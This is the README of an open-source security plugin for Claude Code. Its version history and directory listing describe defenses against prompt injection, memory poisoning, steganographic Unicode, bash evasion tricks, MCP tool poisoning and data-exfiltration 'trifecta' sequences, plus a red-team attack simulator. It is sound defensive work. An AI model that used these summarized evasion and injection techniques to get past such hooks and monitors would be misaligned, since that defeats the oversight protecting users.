# Full LLM-enhanced deep scan (both layers)
/security scan examples/malicious-skill-demo/evil-project-health/ --deep

Key takeaway: A single "Project Health Dashboard" plugin embedded 7 categories of attacks invisible to human review. The Unicode Tag steganography, base64-encoded exfiltration payloads, and one-character-off typosquatting packages would pass casual inspection. Automated scanning caught all of them.

Self-scan: scanning the scanner

Running node scanners/scan-orchestrator.mjs . on this plugin produces 0 findings (ALLOW) with ~190 suppressions via .llm-security-ignore.

Why ~190 suppressed? A security plugin that documents attack patterns, ships a malicious demo fixture, and tests against deliberately evil code will trigger its own scanners. The entropy scanner flags regex patterns in knowledge/secrets-patterns.md. The taint scanner flags eval(user_input) in test fixtures. The network scanner flags evil.com in documentation. The toxic flow analyzer flags the plugin's own commands that use Read+Bash (they're security scanners). Every suppression is explained in the ignore file. Remove .llm-security-ignore and re-run to see all ~190.


Architecture

flowchart TB
    subgraph Runtime["Runtime Defense (9 hooks)"]
        direction LR
        H1["UserPromptSubmit<br/>Injection scan"]
        H2["PreToolUse<br/>Secrets · Paths · Bash · Supply chain"]
        H3["PostToolUse<br/>Output verify · Session guard"]
        H4["Update check"]
    end

    subgraph Scanning["Deterministic Analysis (10+11 scanners)"]
        direction LR
        S1["UNI · ENT · PRM · DEP<br/>TNT · GIT · NET · MEM · SCR"]
        S2["TFA<br/>Toxic flow correlator"]
        S3["MCI · PST · BOM<br/>Standalone scanners"]
    end

    subgraph Advisory["Advisory Analysis (6 agents, 19 commands)"]
        direction LR
        A1["Skill Scanner<br/>7 threat categories"]
        A2["MCP Scanner<br/>5-phase analysis"]
        A3["Posture · Audit<br/>16 categories, A-F grade"]
        A4["Threat Model<br/>STRIDE × MAESTRO"]
    end

    subgraph Knowledge["Knowledge Base (16 files)"]
        direction LR
        K1["5 OWASP frameworks"]
        K2["Threat patterns<br/>Skills · MCP · Secrets"]
        K3["Compliance · Research<br/>Registry · Packages"]
    end

    Runtime -->|"blocks/warns in real time"| User["Claude Code Session"]
    User -->|"/security scan"| Scanning
    User -->|"/security audit"| Advisory
    Advisory -.->|"grounded by"| Knowledge
    Scanning -->|"enriches"| Advisory
    S1 -->|"prior results"| S2

Directory Structure

llm-security/
├── .claude-plugin/plugin.json     # Manifest (v3.0.0)
├── CLAUDE.md                      # Plugin documentation
├── README.md                      # This file
├── LICENSE                        # MIT License
├── SECURITY.md                    # Vulnerability disclosure policy
├── package.json                   # type: module, engines, test script, bin field
├── bin/                           # Standalone CLI
│   └── llm-security.mjs          #   node bin/llm-security.mjs scan/posture/audit-bom/benchmark
├── ci/                            # CI/CD pipeline templates
│   ├── github-action.yml          #   GitHub Actions with SARIF upload
│   ├── azure-pipelines.yml        #   Azure DevOps with SARIF upload
│   └── gitlab-ci.yml              #   GitLab CI with SARIF upload
├── docs/                          # Guides
│   └── ci-cd-guide.md             #   CI/CD integration guide (Schrems II, NSM)
├── commands/                      # 18 slash commands
│   ├── security.md                #   Router + quick start
│   ├── scan.md                    #   Supply chain gate (+ --deep, --fail-on, --compact, --format sarif)
│   ├── deep-scan.md               #   Deterministic-only deep scan
│   ├── diff.md                    #   Compare scan against stored baseline
│   ├── watch.md                   #   Continuous monitoring via /loop
│   ├── registry.md                #   Skill signature registry
│   ├── supply-check.md            #   Re-audit installed dependencies
│   ├── clean.md                   #   Scan + remediate (auto/semi-auto/manual)
│   ├── dashboard.md               #   Cross-project security dashboard
│   ├── audit.md                   #   Full project audit
│   ├── plugin-audit.md            #   Plugin trust assessment
│   ├── mcp-audit.md               #   MCP-focused audit (+ --live flag)
│   ├── mcp-inspect.md             #   Live MCP server inspection via JSON-RPC 2.0
│   ├── posture.md                 #   Quick scorecard (16 categories)
│   ├── harden.md                  #   Generate Grade A security config
│   ├── red-team.md                #   Attack simulation (64 scenarios, adaptive mode)
│   ├── threat-model.md            #   Interactive STRIDE/MAESTRO
│   └── pre-deploy.md              #   Deployment checklist
├── agents/                        # 6 specialized agents
│   ├── skill-scanner-agent.md     #   7 threat categories
│   ├── mcp-scanner-agent.md       #   5-phase MCP analysis
│   ├── posture-assessor-agent.md  #   16-category assessment
│   ├── threat-modeler-agent.md    #   STRIDE × MAESTRO interview
│   ├── deep-scan-synthesizer-agent.md # JSON → human-readable report
│   └── cleaner-agent.md           #   Semi-auto remediation proposals
├── scanners/                      # 10 orchestrated + 11 standalone
│   ├── scan-orchestrator.mjs      #   Entry point — runs all 10 orchestrated, outputs JSON
│   ├── posture-scanner.mjs        #   Standalone: 16-category posture assessment, <50ms
│   ├── attack-simulator.mjs       #   Standalone: red-team harness, 64 scenarios, adaptive mode
│   ├── ai-bom-generator.mjs       #   Standalone: CycloneDX 1.6 AI Bill of Materials
│   ├── dashboard-aggregator.mjs   #   Standalone: cross-project dashboard aggregation
│   ├── reference-config-generator.mjs # Standalone: Grade A config generation
│   ├── supply-chain-recheck-cli.mjs #  Standalone: CLI for supply chain re-audit
│   ├── auto-cleaner.mjs           #   Standalone: remediation engine — 16 fix ops, atomic writes
│   ├── content-extractor.mjs      #   Standalone: pre-extracts evidence, strips injection patterns
│   ├── mcp-live-inspect.mjs       #   Standalone: live MCP server inspection via JSON-RPC 2.0
│   ├── watch-cron.mjs             #   Standalone: cron wrapper for background scanning
│   ├── lib/
│   │   ├── severity.mjs           #   Constants, risk score, verdict logic
│   │   ├── string-utils.mjs       #   Entropy, Levenshtein, base64, redact, obfuscation decoders
│   │   ├── injection-patterns.mjs #   Shared prompt injection patterns (21 critical, 8 high, 15 medium)
│   │   ├── output.mjs             #   Finding/result builders, JSON envelope
│   │   ├── diff-engine.mjs        #   Baseline storage, fingerprinting, diff categorization
│   │   ├── skill-registry.mjs     #   Fingerprinting, caching, pattern search
│   │   ├── file-discovery.mjs     #   Walk tree, filter, binary detect
│   │   ├── yaml-frontmatter.mjs   #   Regex-based frontmatter parser
│   │   ├── git-clone.mjs          #   Sandboxed clone/cleanup (sandbox-exec + git config hardening)
│   │   ├── fs-utils.mjs           #   Backup, restore, cleanup, tmppath (UUID-unique) utilities
│   │   ├── bash-normalize.mjs     #   Bash evasion normalization (empty quotes, ${}, backslash)
│   │   ├── supply-chain-data.mjs  #   Shared blocklists and supply chain data
│   │   ├── sarif-formatter.mjs    #   OASIS SARIF 2.1.0 output formatter
│   │   ├── audit-trail.mjs        #   Structured JSONL audit events (ISO 8601, OWASP tags)
│   │   ├── bom-builder.mjs        #   CycloneDX BOM construction
│   │   ├── distribution-stats.mjs #   Statistical analysis (Jensen-Shannon divergence)
│   │   ├── policy-loader.mjs      #   Reads .llm-security/policy.json for distributable config
│   │   └── mcp-description-cache.mjs # MCP tool description caching + drift detection
│   ├── unicode-scanner.mjs        #   Zero-width, Tags, BIDI, homoglyphs
│   ├── entropy-scanner.mjs        #   Shannon entropy, base64/hex detection
│   ├── permission-mapper.mjs      #   Plugin permission analysis
│   ├── dep-auditor.mjs            #   CVE, typosquatting, install scripts
│   ├── taint-tracer.mjs           #   Source-to-sink data flow tracing
│   ├── git-forensics.mjs          #   Rug pull signals, history analysis
│   ├── network-mapper.mjs         #   URL discovery, DNS, domain classification
│   ├── memory-poisoning-scanner.mjs # Injection in CLAUDE.md, memory, rules files
│   ├── supply-chain-recheck.mjs   #   Re-audit installed deps from lockfiles
│   └── toxic-flow-analyzer.mjs    #   Post-processing correlator: lethal trifecta detection
├── hooks/                         # 9 automated hooks
│   ├── hooks.json                 #   Hook registration
│   └── scripts/
│       ├── pre-prompt-inject-scan.mjs # 21 critical + 8 high + 15 medium patterns, obfuscation decode, configurable mode
│       ├── pre-edit-secrets.mjs   #   13 secret patterns, knowledge/ exclusion
│       ├── pre-write-pathguard.mjs #  8 path categories (env, ssh, aws, gnupg, creds, hooks, system, settings)
│       ├── pre-bash-destructive.mjs # 8 block + 6 warn rules, T1-T6 bash-normalize
│       ├── pre-install-supply-chain.mjs # 7 package managers, CVE/typosquat/age-gate
│       ├── pre-compact-scan.mjs   #   PreCompact: scans transcript tail (500 KB) for injection before compaction, mode: block/warn/off
│       ├── post-mcp-verify.mjs    #   Advisory: ALL tools injection scan, Bash secrets/URLs/size
│       ├── post-session-guard.mjs #   Advisory: runtime trifecta detection (sliding window, JSONL state)
│       └── update-check.mjs      #   Informational: version check (1x/24h, cached, disable: LLM_SECURITY_UPDATE_CHECK=off)
├── knowledge/                     # 16 reference files
│   ├── owasp-llm-top10.md
│   ├── owasp-agentic-top10.md
│   ├── owasp-skills-top10.md      #   OWASP Skills Top 10 (AST01-AST10)
│   ├── skill-threat-patterns.md
│   ├── mcp-threat-patterns.md
│   ├── secrets-patterns.md
│   ├── mitigation-matrix.md
│   ├── compliance-mapping.md      #   EU AI Act, NIST AI RMF, ISO 42001, MITRE ATLAS
│   ├── norwegian-context.md       #   Datatilsynet, NSM, Digitaliseringsdirektoratet
│   ├── deepmind-agent-traps.md    #   6 categories, 43 techniques
│   ├── prompt-injection-research-2025-2026.md # 7 research papers
│   ├── attack-scenarios.json      #   64 red-team scenarios across 12 categories
│   ├── attack-mutations.json      #   Synonym tables for adaptive testing
│   ├── typosquat-allowlist.json   #   False positive reduction
│   ├── top-packages.json          #   Top 200 npm + 100 PyPI for typosquatting
│   └── skill-registry.json        #   Seed data for skill signature registry
├── tests/                         # Test suite (node:test, zero external deps)
│   ├── lib/                       #   Unit tests for shared library
│   ├── scanners/                  #   Integration tests against fixture
│   └── fixtures/                  #   Test-specific data (dep-test)
├── reports/                        # Scan reports (.docx + .md source)
│   ├── baselines/                 #   Stored scan baselines for diff comparison
│   └── watch/                     #   Cron scan results (latest.json) + config
├── examples/                      # Demo fixtures
│   └── malicious-skill-demo/      #   Regression test (47+ findings, BLOCK)
└── templates/                     # Report templates (1 unified + archive)
    ├── unified-report.md          #   All 9 analysis types via conditional sections
    └── archive/                   #   9 original templates preserved for reference

~25,400 lines across ~100 active files (+10 archived). Minimal persistent state: scan baselines in reports/baselines/, watch results in reports/watch/, skill registry in reports/skill-registry.json, session guard JSONL in /tmp/, update-check cache in ~/.cache/. All scan outputs generated fresh per invocation.


What This Plugin Does Not Cover

Area Why Alternative
CLAUDE.md poisoning (post-clone) Once a repo is cloned, CLAUDE.md loads into the system prompt before any hooks run. No hook-based solution can intercept this after cloning. This is exactly why you should scan repos remotely before cloning: /security scan https://repo-url --deep analyzes CLAUDE.md and all other files via the pre-extraction layer without ever loading them into your session. Always scan before cloning unknown repos. For repos already cloned: manually review CLAUDE.md before opening with Claude Code. See context-filter for experimental OS-level interposition (macOS only, requires re-signing after Claude Code updates).
ML-based injection classification Regex patterns cannot catch novel phrasings, multilingual injection, or adversarial rephrasing that semantic models can. Use parry-guard alongside this plugin for DeBERTa/Llama Prompt Guard 2 ML classification.
Enterprise SSO/SCIM Platform-level configuration Anthropic Admin Console
RAG infrastructure Vector DB / embedding pipeline security Dedicated RAG security tools
LLM gateway/proxy Network infrastructure API gateway solutions
SIEM integration Organization security stack Splunk, Sentinel, etc.
Runtime scheming detection The session guard hook detects lethal trifecta patterns (a known attack sequence), but general scheming — where an agent pursues hidden goals through novel strategies — remains fundamentally hard for any tool. Session guard provides partial coverage. Full scheming detection requires monitoring + human oversight

These gaps are surfaced advisorily through /security threat-model and /security pre-deploy.


Complementary Tools

This plugin provides full-stack security hardening (static analysis + supply chain + audit + threat modeling). For organizations wanting defense in depth, these tools cover areas we intentionally leave to specialists:

Tool What It Adds How It Complements
parry-guard ML-based prompt injection detection (DeBERTa v3 + Llama Prompt Guard 2 86M) in Rust. Fail-closed: uncertain = unsafe. Our regex patterns catch known injection signatures. parry-guard catches novel phrasings, multilingual injection, and adversarial rephrasing via semantic ML models. No overlap, no conflict.
Lasso claude-hooks Warn-and-continue PostToolUse hook. 96 patterns across 5 categories. allowManagedHooksOnly for team deployment. Different philosophy: Lasso warns but never blocks, letting Claude decide with context. Our hooks block critical patterns. Both can run together; hooks execute sequentially.
Snyk agent-scan Commercial skills/MCP scanning with a larger dataset (3,984 skills analyzed). Tool poisoning and shadowing detection. Our skill-scanner-agent covers the same 7 threat categories. Snyk has a larger training set from scanning the full ClawHub marketplace. Use both for maximum coverage.

Tip

Recommended combo: llm-security (breadth: static + supply chain + audit + posture + threat modeling) + parry-guard (depth: ML injection classification). They cover different layers with no conflicts.


Compatibility

  • Claude Code: v2.x+
  • Platform: macOS, Linux, Windows (all hooks are Node.js .mjs)
  • Node.js: Required for hook scripts (any recent LTS version)
  • Overlap with claude-code-essentials: Safe to run both. This plugin extends claude-code-essentials with path guarding and MCP verification. Duplicate blocking is harmless — hooks run sequentially.

Version History

Version Date Highlights
6.5.0 2026-04-17 OS sandbox for /security ide-scan <url>. VSIX fetch + extract now runs in a sub-process wrapped by sandbox-exec (macOS) or bwrap (Linux), reusing the same primitives proven by the v5.1 git-clone sandbox. Defense-in-depth — even if lib/zip-extract.mjs ever has a bypass, the kernel refuses any write outside the per-scan temp directory. New: lib/vsix-fetch-worker.mjs (sub-process worker with deterministic JSON-line IPC) and lib/vsix-sandbox.mjs (buildSandboxProfile / buildBwrapArgs / buildSandboxedWorker / runVsixWorker, 35 s timeout, 1 MB stdout cap). New scan(target, { useSandbox }) option (default true for CLI; tests use false since globalThis.fetch mocks do not cross processes). Windows fallback: in-process with meta.warnings advisory. Envelope meta.source.sandbox field: 'sandbox-exec' | 'bwrap' | 'none' | 'in-process'. 1352 tests (was 1344).
6.4.0 2026-04-17 /security ide-scan <url> — pre-install verification. The IDE extension scanner now accepts URLs and fetches the VSIX before scanning. Supported: VS Code Marketplace (https://marketplace.visualstudio.com/items?itemName=publisher.name), OpenVSX (https://open-vsx.org/extension/publisher/name[/version]), and direct .vsix URLs. New libraries: lib/vsix-fetch.mjs (HTTPS-only fetch with 50MB cap, 30s timeout, SHA-256, manual host-whitelisted redirects) and lib/zip-extract.mjs (zero-dep ZIP parser, rejects zip-slip / symlinks / absolute paths / drive letters / encrypted entries / ZIP64; caps: 10 000 entries, 500MB uncompressed, 100x expansion ratio, depth 20). Temp dir always cleaned in try/finally. Envelope meta.source carries { type: "url", kind, url, finalUrl, sha256, size, publisher, name, version }. New knowledge file: marketplace-api-notes.md. GitHub repo URLs intentionally not supported (would require a build step). 1344 tests (was 1296).
6.3.0 2026-04-17 IDE extension prescan. New /security ide-scan command and ide-extension-scanner.mjs (prefix IDE) discover and audit installed VS Code extensions (and forks: Cursor, Windsurf, VSCodium, code-server, Insiders, Remote-SSH; JetBrains is a v1.1 stub). 7 IDE-specific checks: blocklist match, theme-with-code, sideload (.vsix), broad activation (*, onStartupFinished), Levenshtein typosquat ≤2 vs top-100, extension-pack expansion, dangerous vscode:uninstall hooks. Per-extension orchestration of UNI/ENT/NET/TNT/MEM/SCR scanners with bounded concurrency. OS-aware discovery via lib/ide-extension-discovery.mjs (Platform-specific suffix parsing for darwin-x64, linux-arm64, etc.). Offline-first; --online opt-in for future Marketplace/OSV.dev lookups. New knowledge files: ide-extension-threat-patterns.md (10 categories, 2024-2026 case studies from Koi Security — GlassWorm, WhiteCobra, TigerJack, Material Theme), top-vscode-extensions.json (typosquat seed + blocklist), top-jetbrains-plugins.json (stub). 1296 tests (was 1274).
6.2.0 2026-04-17 Opus 4.7 + Claude Code 2.1.112 alignment. Bash-normalize extended with T5 (${IFS} word-splitting) and T6 (ANSI-C $'\xHH' hex quoting) layers. New pre-compact-scan.mjs PreCompact hook — scans transcript tail (500 KB cap, <500 ms) for injection + credentials before context compaction. Modes: block / warn / off via LLM_SECURITY_PRECOMPACT_MODE. Agent files reframed for Opus 4.7's more literal instruction-following (Step 0 generaliseringsgrense + parallell Read-hint in skill-scanner + mcp-scanner). New docs/security-hardening-guide.md with env-var reference, sandboxing notes, system-card §5.2.1 / §6.3.1.1 mapping. CLAUDE.md Defense Philosophy links to system card. 1274 tests (was 1264).
6.1.0 2026-04-10 CI/CD integration. --fail-on <severity> flag for threshold-based exit codes (exit 1 if findings at/above level). --compact output mode (one-liner per finding). Policy ci section in policy.json. Pipeline templates: GitHub Actions, Azure DevOps, GitLab CI with SARIF upload. CI/CD guide (docs/ci-cd-guide.md) with Schrems II/NSM compliance docs. npm publish preparation (files whitelist). 1264 tests.
6.0.0 2026-04-10 CAISS-readiness release. Enterprise compliance and governance layer: compliance mapping (EU AI Act, NIST AI RMF, ISO 42001, MITRE ATLAS), Norwegian regulatory context (Datatilsynet, NSM, Digitaliseringsdirektoratet), SARIF 2.1.0 output format (--format sarif), structured JSONL audit trail (audit-trail.mjs), AI-BOM generator (CycloneDX 1.6), policy-as-code (.llm-security/policy.json), standalone CLI (bin/llm-security.mjsnode bin/llm-security.mjs scan). Posture scanner expanded to 16 categories (+EU AI Act, NIST AI RMF, ISO 42001). Attack simulator benchmark mode (--benchmark). 15 knowledge docs, 16 scanners, 1242+ tests.
5.1.0 2026-04-07 Sandboxed remote cloning. Defense-in-depth for git clone attack surface: (1) 8 git config flags disable hooks, symlinks, filter/smudge drivers, fsmonitor, local file protocol; 4 env vars isolate from system/user config. (2) OS sandbox: macOS sandbox-exec + Linux bubblewrap restrict file writes to only the clone temp dir. Graceful fallback on Windows (git config only). Post-clone size check (100MB max). UUID-unique evidence filenames prevent race conditions. Cleanup guarantee in scan/plugin-audit commands. 1147 tests (was 1115).
5.0.0 2026-04-06 Prompt Injection Hardening (v5.0). 8-session defense-in-depth overhaul driven by 7 research papers (2025-2026). MEDIUM advisory for obfuscation signals (leetspeak, homoglyphs, zero-width, multi-language). Unicode Tag steganography detection (U+E0000-E007F). Bash expansion normalization (bash-normalize.mjs). Rule of Two enforcement (configurable LLM_SECURITY_TRIFECTA_MODE=block|warn|off). 100-call long-horizon monitoring window with slow-burn trifecta detection. Behavioral drift via Jensen-Shannon divergence. HITL trap detection (approval urgency, summary suppression, scope minimization). Sub-agent delegation tracking (escalation-after-input advisory). NL indirection patterns. Hybrid attacks (P2SQL, recursive injection, XSS-in-agent). CaMeL-inspired data flow tagging (SHA-256 provenance, output-to-input linking). Adaptive red-team (5 mutation rounds per scenario: homoglyph, encoding, zero-width, case alternation, synonym). Knowledge base expanded: prompt-injection-research-2025-2026.md, deepmind-agent-traps.md, attack-mutations.json. Posture scanner expanded to 13 categories (+Prompt Injection Hardening, Rule of Two, Long-Horizon Monitoring). Defense Philosophy section documenting honest limitations. 1115 tests.
4.5.1 2026-04-04 Cross-platform support. Windows/Linux compatibility: fileURLToPath(), path.dirname(), native fetch() replaces curl subprocess, fixed tilde expansion regex. 11 files, 782 tests pass.
4.5.0 2026-04-04 Attack simulation / red-team mode. New attack-simulator.mjs runs 38 crafted attack scenarios across 7 categories (secrets, destructive, supply-chain, prompt-injection, pathguard, mcp-output, session-trifecta) against the plugin's own hooks. Data-driven via knowledge/attack-scenarios.json with runtime payload assembly. New /security red-team command with --category filter. Capstone release: v4.0 roadmap complete (S1-S6). 18 commands, 16 scanners (10 orchestrated + 6 standalone). 782 tests.
4.4.0 2026-04-03 Cross-project security dashboard. New dashboard-aggregator.mjs discovers all Claude Code projects under ~/ (depth 3) and ~/.claude/plugins/, runs posture-scanner on each. Machine grade = weakest link. Cache in ~/.cache/llm-security/dashboard-latest.json (24h staleness). New /security dashboard command. 17 commands, 15 scanners (10 orchestrated + 5 standalone). 751 tests.
4.3.0 2026-04-03 Enhanced MCP session monitoring. MCP description drift detection via mcp-description-cache.mjs — caches tool descriptions, alerts on >10% Levenshtein drift (OWASP MCP05 rug-pull). MCP-concentrated trifecta in post-session-guard.mjs — elevated severity when all 3 lethal trifecta legs trace to the same MCP server. Cumulative data volume tracking (100KB/500KB/1MB thresholds, OWASP ASI02). Per-MCP-tool volume tracking in post-mcp-verify.mjs (>100KB per tool = advisory). 735 tests.
4.2.0 2026-04-03 Supply chain re-check scanner. New supply-chain-recheck.mjs (prefix SCR) periodically re-audits installed dependencies from lockfiles against blocklists, OSV.dev batch API, and typosquat detection. Shared data module extracts blocklists from hook. New /security supply-check command. 16 commands, 14 scanners (10 orchestrated + 4 standalone). 700 tests.
4.1.0 2026-04-03 Reference configuration generator. New /security harden command generates Grade A security config based on posture scanner gaps. New reference-config-generator.mjs standalone scanner detects project type (plugin/monorepo/standalone) and generates settings.json (deny-first), CLAUDE.md security section, and .gitignore additions. --dry-run (default) shows JSON output; --apply writes files with backup. Post-apply verification re-runs posture scanner. Templates in templates/reference-config/. 15 commands, 12 scanners (9 orchestrated + 4 standalone). 670 tests.
4.0.0 2026-04-03 Deterministic posture scanner. New posture-scanner.mjs — standalone scanner (prefix PST) replacing Opus agent for /security posture. 10 categories assessed in <50ms (was ~6 min). Categories: Deny-First, Secrets, Path Guarding, MCP Trust, Destructive Blocking, Sandbox, Human Review, Plugin Sources, Session Isolation, Cognitive State Security. Reuses scanForInjection() and gradeFromPassRate(). /security audit now runs scanner first for instant data, then agents for narrative. 12 scanners (9 orchestrated + 3 standalone). 647 tests.
3.1.1 2026-04-03 Memory poisoning scanner (Cognitive State Traps). New memory-poisoning-scanner.mjs — scanner #9 in orchestrator (prefix MEM, OWASP: LLM01+ASI02). Detects 6 threat categories in CLAUDE.md, memory files, .claude/rules, REMEMBER.md, and *.local.md: injection patterns (via shared injection-patterns.mjs), shell commands in memory files, suspicious exfiltration URLs (webhook.site/ngrok/pipedream/etc.), credential path references (.ssh/.aws/id_rsa/credentials.json), permission expansion directives (bypassPermissions/dangerouslySkipPermissions), encoded payloads (base64 >40 chars, hex >64 chars). Posture assessor gains Category 10: Cognitive State Security. 11 scanners (9 orchestrated + 2 standalone). 606 tests (was 588).
3.1.0 2026-04-03 AI Agent Traps defense. Gap analysis against AI Agent Traps (Franklin et al., Google DeepMind, 2025). New detections: HTML/CSS content obfuscation (6 patterns for display:none, visibility:hidden, off-screen positioning, zero font-size/opacity, aria-label injection), oversight evasion (9 patterns for educational/hypothetical/red-team/research framing), markdown syntactic masking (anchor text injection payloads). Encoding hardening: HTML entity decoding (named, decimal, hex), recursive multi-layer decode (max 3 iterations), letter-spacing collapse. post-mcp-verify hook gains HTML content trap detection for WebFetch/Read/MCP output. Knowledge base updated with Agent Traps taxonomy mapping. 588 tests (was 544).
3.0.0 2026-04-03 Public release. 8 sessions from v2.5→v3.0. New in v3: toxic flow analysis (TFA scanner — lethal trifecta detection via cross-component correlation), runtime session guard (PostToolUse trifecta monitoring with sliding window), MCP live inspection (JSON-RPC 2.0 connect to running servers), report diffing with baselines (fuzzy matching, new/resolved/moved), continuous scanning (watch command + cron wrapper), skill signature registry (SHA-256 fingerprinting + cache). 4 OWASP frameworks (LLM Top 10, Agentic AI, Skills, MCP). 15 commands, 8 hooks, 10 scanners (8 orchestrated + 2 standalone), 6 agents, 9 knowledge files, 544 tests. Architecture diagram added.
2.9.2 2026-04-03 Skill signature registry. New skill-registry.mjs library for SHA-256 fingerprinting of normalized skill content, scan result caching, and pattern search. New /security registry command with stats, scan+register, and search sub-commands. /security scan now checks registry before full scan — instant result for known fingerprints (7-day staleness threshold). Seed data in knowledge/skill-registry.json, active registry in reports/skill-registry.json. 15 commands, 9 knowledge files total.
2.9.1 2026-04-03 Continuous/background scanning. New /security watch [path] [--interval 6h] command uses the built-in /loop skill to run /security diff on a recurring interval. New watch-cron.mjs standalone script for system cron/launchd — reads multi-target config from reports/watch/config.json, writes summary to reports/watch/latest.json, exits with worst verdict code (0/1/2). 13 commands total.
2.9.0 2026-04-03 Report diffing & baseline. New diff-engine.mjs library for finding fingerprinting, fuzzy line matching (±3), and diff categorization (new/resolved/unchanged/moved). Scan orchestrator gains --baseline and --save-baseline flags. Baselines stored per target hash in reports/baselines/. New /security diff command compares current scan against stored baseline and shows delta. 12 commands total.
2.8.1 2026-04-03 Auto update notifications. New update-check.mjs UserPromptSubmit hook checks for newer plugin versions against the public Forgejo repo (max 1x/24h, cached in ~/.cache/llm-security/). Notifies via systemMessage when a newer version is available. Disable: LLM_SECURITY_UPDATE_CHECK=off. 8 hooks total.
2.8.0 2026-04-02 MCP Runtime Inspection. New mcp-live-inspect.mjs standalone scanner connects to MCP stdio servers via JSON-RPC 2.0, fetches live tool/prompt/resource lists, scans descriptions for injection (MCP03, MCP06), tool shadowing across servers (MCP09), URL/IP in descriptions. New /security mcp-inspect command. /security mcp-audit --live flag for combined static + live analysis with cross-reference escalation. Scanner prefix: MCI. 9 scanners (8 orchestrated + 1 standalone), 11 commands total.
2.7.1 2026-04-02 Runtime session guard hook. PostToolUse hook monitoring tool call sequences for lethal trifecta (untrusted input + sensitive data access + exfiltration sink). Sliding window (20 calls), per-session JSONL state, advisory warning. 7 hooks total.
2.7.0 2026-04-02 Toxic flow analysis scanner. 8th deterministic scanner detecting lethal trifecta patterns in plugin component definitions. Post-processing correlator consuming output from all prior scanners. Direct, cross-component, and project-level trifecta detection with mitigation downgrades.
2.6.0 2026-04-02 MEDIUM injection patterns + 4-framework OWASP mapping. Added ~15 MEDIUM-severity patterns (base64 payloads, leetspeak, homoglyphs). Full OWASP mapping: LLM Top 10, Agentic AI Top 10 (ASI), Skills Top 10 (AST), MCP Top 10. New knowledge file owasp-skills-top10.md. 8 knowledge files total.
2.5.0 2026-04-02 Pre-extraction indirection layer for remote scan defense. Remote scans now pre-extract structured evidence via content-extractor.mjs and strip injection patterns BEFORE LLM agents see the content. Agents analyze a JSON evidence package, never raw files from untrusted repos. [INJECTION-PATTERN-STRIPPED] markers are confirmed findings.
2.4.0 2026-04-01 GitHub repo URL support for scan and plugin-audit. scan and plugin-audit accept https://github.com/... URLs directly. Clones to temp dir via scanners/lib/git-clone.mjs, scans locally, cleans up. --branch <name> flag for non-default branches.
2.3.0 2026-04-01 PostToolUse expanded to ALL tools + configurable injection mode. 498 tests (was 470). PostToolUse hook now scans Read, WebFetch, MCP, and all other tool output for indirect prompt injection (was Bash-only). Bash-specific checks (secrets, URLs, large output) preserved. Short output skip (<100 chars) for performance. LLM_SECURITY_INJECTION_MODE env var: block (default), warn (advisory-only), off (disable). Complementary Tools section documenting parry-guard, Lasso, Snyk compatibility. CLAUDE.md poisoning gap documented as known limitation.
2.2.0 2026-04-01 Prompt injection runtime defense (Gaps 1-3). 470 tests (was 383). New UserPromptSubmit hook blocks injection in user input. post-mcp-verify extended with indirect injection scanning in tool output (LLM01). Obfuscation decoding: unicode-escape, hex-escape, URL-encoding, base64 normalization before pattern matching. Shared injection-patterns.mjs module with 21 critical + 8 high patterns from skill-scanner-agent Category 1. LLM01 coverage 83%->95%, LLM05 80%->83%.
2.1.0 2026-04-01 383 tests (was 177): full hook coverage (66 tests), auto-cleaner coverage (140 tests), auto-cleaner import guard fix, solo project (CONTRIBUTING.md removed), HTTPS install URL under fromaitochitta org, model defaults set to sonnet
2.0.0 2026-03-31 Open-source release: MIT LICENSE, SECURITY.md, test suite (node:test), path guarding hook (pre-write-pathguard.mjs), supply chain hook documentation, version alignment, .gitignore, .editorconfig
1.4.0 2026-02-21 Unified risk scoring formula (25/10/4/1 weights), score-based verdicts, risk bands (Low→Extreme), OWASP categorization, A-F grading function, single unified-report.md template replacing 9 separate templates with conditional sections per analysis type
1.3.0 2026-02-21 /security clean command with 3-tier remediation (auto/semi-auto/manual), auto-cleaner.mjs engine (16 fix operations, atomic writes, post-fix validation), cleaner-agent for semi-auto proposals, clean-report.md template, --dry-run flag
1.2.0 2026-02-19 7 deterministic Node.js scanners (unicode, entropy, permissions, dependencies, taint, git forensics, network), deep-scan command + --deep flag, synthesizer agent, shared scanner library, demo fixture with 85-finding security assessment, OWASP coverage improvements (LLM01 70→85%, LLM02 90→95%, LLM03 80→90%, LLM06 85→95%)
1.1.0 2026-02-19 Plugin audit command (/security plugin-audit), MCP audit command (/security mcp-audit), pre-deployment checklist (/security pre-deploy), 3 new report templates, updated OWASP coverage (LLM03 75%→80%)
1.0.0 2026-02-19 Initial release — 4 agents, 4 hooks, 6 knowledge files (2,771 lines), 8 commands, 7 report templates. OWASP LLM Top 10 + Agentic AI Top 10 coverage

License & Attribution

This project is licensed under the MIT License.

Knowledge base files in knowledge/ are derived from published OWASP standards and security research papers. OWASP content is used under the CC BY-SA 4.0 license.

Threat intelligence sources: AI Agent Traps (Franklin et al., Google DeepMind, 2025), ToxicSkills (Xi'an Jiaotong, 2025), ClawHavoc (Repello AI, 2025), MCPTox (Invariant Labs, 2025), Pillar Security MCP Research (2025), Operant AI Agentic Security (2025).

The plugin architecture, scan pipeline, threat detection patterns, and security assessment methodology are original work.

Part of From AI to Chitta. Source: git.fromaitochitta.com/open/claude-code-llm-security.

Feedback & Requests

Contributing

This is a solo project. See Feedback & Requests for how to report bugs or suggest features. Pull requests are not accepted.

Microsoft and OWASP product names are trademarks of their respective owners. This project is not endorsed by or affiliated with any referenced organization.